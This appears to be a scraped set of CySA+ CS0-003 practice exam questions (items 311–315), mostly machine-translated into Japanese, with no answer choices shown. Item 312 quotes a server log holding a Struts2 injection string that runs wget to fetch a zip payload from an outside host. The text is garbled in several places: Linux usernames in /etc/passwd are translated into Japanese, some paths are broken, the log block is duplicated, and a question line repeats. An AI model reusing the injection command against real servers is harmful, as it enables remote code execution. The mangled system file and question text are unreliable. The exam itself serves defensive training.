CS0-003 試験問題 311
セキュリティアナリストは、インフラチームに新しいパッチ情報をより迅速に提供するためのサーバーパッチ管理ポリシーの策定に取り組んでいます。脆弱性を迅速に修正するために、インフラチームに最も必要なのは次のうちどれですか?(2つ選択してください。)
CS0-003 試験問題 312
インシデント対応チームのメンバーがLinuxサーバーのトリアージを行っています。出力は以下の通りです。
$ cat /etc/passwd
ルート:x:0:0::/:/bin/zsh
bin : x : 1 : 1 : : / : / usr / bin / nlogin
デーモン : x : 2 : 2 : : / : / usr / bin / nologin
メール:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
誰も:x:65534:65534:誰も:/:/usr/bin/nologin
git:x:972:972:gitデーモン ユーザー:/:/usr/bin/git-shell
$ cat /var/log/httpd
org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) 警告
[struts2.dispatcher.multipart.JakartaMultipartRequest] リクエスト container.getlnstance を解析できません。(#wget
http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init> (FileUploadBase.java:947) org.apache.commons.fileupload.FileUploadBase.getItemiterator (FileUploadBase.java:334) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.
java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest (JakartaMultipartRequest.java:423) 攻撃者が実行しようとしている可能性が最も高いのは次のうちどれですか。
$ cat /etc/passwd
ルート:x:0:0::/:/bin/zsh
bin : x : 1 : 1 : : / : / usr / bin / nlogin
デーモン : x : 2 : 2 : : / : / usr / bin / nologin
メール:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
誰も:x:65534:65534:誰も:/:/usr/bin/nologin
git:x:972:972:gitデーモン ユーザー:/:/usr/bin/git-shell
$ cat /var/log/httpd
org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) 警告
[struts2.dispatcher.multipart.JakartaMultipartRequest] リクエスト container.getlnstance を解析できません。(#wget
http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init> (FileUploadBase.java:947) org.apache.commons.fileupload.FileUploadBase.getItemiterator (FileUploadBase.java:334) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.
java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest (JakartaMultipartRequest.java:423) 攻撃者が実行しようとしている可能性が最も高いのは次のうちどれですか。
CS0-003 試験問題 313
セキュリティアナリストは、ゲートウェイからパケットキャプチャを収集することで、疑わしいIPアドレスへの接続を検出しようとしています。セキュリティアナリストは、以下のコマンドのうちどれを実行することを検討すべきでしょうか?
CS0-003 試験問題 314
A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remain inside of it for an extended period of time.
Which of the following techniques should be performed to meet the CISO's goals?
Which of the following techniques should be performed to meet the CISO's goals?
CS0-003 試験問題 315
Which of the following is the most important factor to ensure accurate incident response reporting?